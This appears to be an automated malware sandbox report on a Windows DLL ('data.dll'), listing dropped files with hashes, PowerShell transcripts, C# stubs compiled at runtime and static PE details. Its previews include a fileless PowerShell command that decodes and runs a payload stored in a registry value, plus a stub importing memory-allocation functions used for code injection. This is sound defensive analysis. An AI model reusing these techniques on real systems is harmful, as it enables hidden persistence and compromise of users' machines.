                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.aixojixg.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1040997079419537
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRWak7YnqqyHPN5Dlq5J:+RI+ycuZhNbWakSyHPNnqX
                                                          MD5:9907C63C948829AE092C374047EE5A7F
                                                          SHA1:16272A7ED54545B9C5EB9DB21BAF114DBBEBA3F6
                                                          SHA-256:67EDC019440BEAB697297DA6152E19A52C0FE9B6E19A60C6CE235A60C7ECC9A4
                                                          SHA-512:B4D72964DF5A8CFC8CFAA248BD4F05F6C578EF47CEBFBD240AE15E3123088CE88CFFD212265D836A2B3EB6784762CDBDA5AEE08C13FC77F38C3807E61C6EAF16
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.260808918395778
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpvJUzxs7+AEszIwkn23fpF9:p37Lvkmb6KRfhv+WZEifhr
                                                          MD5:0330280B07D13A01DEC77E2EDC601878
                                                          SHA1:D0F5CBC44E5B7DDD673F51164A68DE0C47E7EC74
                                                          SHA-256:A6904C47757F5AC51C966E7BC9D0BC5B6EB9F09C53FC843CD3B28ACF44DA2F37
                                                          SHA-512:6E6B2A6F74845D5207AA9D57558E701B842392CB1D89B02ECAFEACAB746C22054E9A92F7AB9D7A5B8C9A7C7764CEB054F6CA17AF7DE9A6A54C8F28C0110EEB87
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6445805370692286
                                                          Encrypted:false
                                                          SSDEEP:24:etGSi/WMOWEey8MTz7X8daP0eWQyaDdWSWtJ0DtkZfgB/7XI+ycuZhNbWakSyHPE:6i/A7KMTcd6qZkWPVJgh1ulqa3+q
                                                          MD5:A4133BB77D49BF5FE87ABE8507B3EBD7
                                                          SHA1:1871D83D9E0E0850DF8F2146693135C4F7770EE5
                                                          SHA-256:365D9862EAB5F5F08A5926E86058C33BE06692E309FD3D5F53085BF7636CD97F
                                                          SHA-512:17EDADBCD3E5AE487E6652567B5A046AD4955084458B5951A9C365C9BC43E43A7EF67D5109F4E4319A98695CF30FF18046F8796F3042BC82D30605BF209FA36C
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.ddwuzigh.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1124345771696067
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqfPN5Dlq5J:+RI+ycuZhNRakSfPNnqX
                                                          MD5:B7D8E5C3BC81D5C419A478823788E0F7
                                                          SHA1:CCF5C55CAC587EBB0C20A4FB2D615BA1746EB793
                                                          SHA-256:570747FD73BC71FF18100C1F1F58F31127BB6497396718176BDE33882C949C36
                                                          SHA-512:5B42A169F5F8A6D9EF707BFF46CFF188027473576C4FA1E0C5E1C4D214AFAB5FD92131DA1F7CF2276985A6B514511C08241BDF300B6B763E6CAF43823CF24912
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:true
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.271207229716755
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fCN5WNDJH0zxs7+AEszIwkn23fCN5W5:p37Lvkmb6KRfJB+WZEifJrFH
                                                          MD5:6CF8D7A784B60B520B01D64CFDEC3508
                                                          SHA1:CD91CFE9EF2EDA8F6411ED9A6817FD7553709484
                                                          SHA-256:9903E082EA138385CE8CA2418FD1848F422EA4391352B5B5ED57D12C69500D7B
                                                          SHA-512:4FDD957F2C27F2E0C566066310715DD6A4F70921E8140FCDC8893931E2D72DB1E79CB96AB74714250AD0735C9502B4BE767FE3FDD82CE4A14519C56F9C690BC6
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6442225461586313
                                                          Encrypted:false
                                                          SSDEEP:24:etGSrXWMOWEey8MTz7X8daP0eWQSDdWSWtJ0DtkZf6mBqO7XI+ycuZhNRakSfPNq:6bA7KMTcd6q1WPVJ6mU81ulRa39q
                                                          MD5:DE4F576253BDA1AE82659E3E111C25E6
                                                          SHA1:8A1237FCD0B3E732089509C1AA08FD31532A7564
                                                          SHA-256:599CF9AE58AA3E33D27F5A6B179DC111FCE16A907A2BA8EFEE485E483A07DD44
                                                          SHA-512:388163ABC93D673A14C861172E2BAE47078E38114660CAC4361433B8A1E7EADE57BAFEC90753C1BE5F60FDFCE7EF7A61966AF51642DF979CF8CA4A447AAA1F8A
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.keehvxm3.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.NcA_PxyH.20211007013229.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.305482263812092
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWxHjeTKKjX4CIym1ZJXyOLCHGIYBtB7nxSAO:BZqvjQoORFeVxqDYB1ZQFerZZw
                                                          MD5:59590A90D28BC6CF4C8C601B8DD050B5
                                                          SHA1:683AE8715C414BA8B4FBB180D5428437C1A0C239
                                                          SHA-256:98CB74CD1B59345C836ECAFD81BF563BE36E0931F98D07D4643D2F2A01B124EF
                                                          SHA-512:DAC46930F0F98749EF7719761FD4D9A5E6E3EDF6AD16810CF6CD90164A9F08E66E8155F4583AE80D75DAC6F2C89B30C4E3142099A28B97B8C970403D5483DF9F
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.uobBzu5J.20211007013230.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.308334237745025
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWWHjeTKKjX4CIym1ZJXyOLCHGIYBtBamnxS8:BZqvjQoORFeVWqDYB1ZQFeaoZZ6C
                                                          MD5:F38AD184905D39ED5F604BD58DF787FB
                                                          SHA1:DA25886901C51B476DD82D233102E94B5E61B6E2
                                                          SHA-256:CF176D0FC864490B8181A27D38241E0140ADBB22A58ACB2F4791909922E08C31
                                                          SHA-512:AB3EEB69125BAA4D4E14C89361B05C6D551F46B370919601E5C8E64D211E9FB66966664E379B90E61CA0640E738B625B03FE8B3457824ACDBC55F87A2D2F5524
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3740..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          \Device\ConDrv
                                                          Process:C:\Windows\System32\nslookup.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):28
                                                          Entropy (8bit):4.039148671903071
                                                          Encrypted:false
                                                          SSDEEP:3:U+6QlBxAN:U+7BW
                                                          MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                          SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                          SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                          SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                          Malicious:false
                                                          Preview: Non-authoritative answer:...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.647077324309591
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                          • DOS Executable Generic (2002/1) 0.20%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:data.dll
                                                          File size:453131
                                                          MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
                                                          SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
                                                          SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
                                                          SHA512:0f19a2902265b9e56e8f46ffe283a2796142ab59ef42d97a957bb6327494f838d8a262b957152ad768322bca4b2c05188c386c54a5c65c77c60c3205c742ea30
                                                          SSDEEP:12288:kHlAiJHCwjXvMHk37t4Mv//IfN/YoyL8ozF0nxatQ7:kHltJHCkvH/IJvUWxata
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g....l..g..K.8..g...9...g...9...g....0..g...9...g....4..g...g...f...9...g...9..(g...9...g...9...g...9...g..Rich.g.

                                                          File Icon

                                                          Icon Hash:74f0e4ecccdce0e4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x10007197
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x57EEB746 [Fri Sep 30 19:04:38 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:3a94ffcdb86144f7d0b6d92dd3393d93

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+0Ch], 01h
                                                          jne 00007F83D8F13BC7h
                                                          call 00007F83D8F1435Bh
                                                          push dword ptr [ebp+10h]
                                                          push dword ptr [ebp+0Ch]
                                                          push dword ptr [ebp+08h]
                                                          call 00007F83D8F13A7Ah
                                                          add esp, 0Ch
                                                          pop ebp
                                                          retn 000Ch
                                                          push ebp
                                                          mov ebp, esp
                                                          push 00000000h
                                                          call dword ptr [1004F06Ch]
                                                          push dword ptr [ebp+08h]
                                                          call dword ptr [1004F068h]
                                                          push C0000409h
                                                          call dword ptr [1004F060h]
                                                          push eax
                                                          call dword ptr [1004F070h]
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000324h
                                                          push 00000017h
                                                          call 00007F83D8F47B7Fh
                                                          test eax, eax
                                                          je 00007F83D8F13BC7h
                                                          push 00000002h
                                                          pop ecx
                                                          int 29h
                                                          mov dword ptr [1006CD98h], eax
                                                          mov dword ptr [1006CD94h], ecx
                                                          mov dword ptr [1006CD90h], edx
                                                          mov dword ptr [1006CD8Ch], ebx
                                                          mov dword ptr [1006CD88h], esi
                                                          mov dword ptr [1006CD84h], edi
                                                          mov word ptr [1006CDB0h], ss
                                                          mov word ptr [1006CDA4h], cs
                                                          mov word ptr [1006CD80h], ds
                                                          mov word ptr [1006CD7Ch], es
                                                          mov word ptr [1006CD78h], fs
                                                          mov word ptr [1006CD74h], gs
                                                          pushfd
                                                          pop dword ptr [1006CDA8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [1006CD9Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [1006CDA0h], eax

                                                          Rich Headers

                                                          Programming Language:
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x6ae900xb0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6af400x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1090000x440.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000x2cbc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x691400x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x691980x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x19c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x4d48c0x4d600False0.541116594305data6.75100933622IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rdata0x4f0000x1c8ec0x1ca00False0.58397584607data5.72385266985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x6c0000x9b7e80xe00False0.204520089286data2.89792338491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .gfids0x1080000x2280x400False0.2529296875data1.74193986935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0x1090000x4400x600False0.292317708333data2.5339353314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x10a0000x2cbc0x2e00False0.777513586957data6.63564333671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x1090600x3dcdataEnglishUnited States

                                                          Imports

                                                          DLLImport
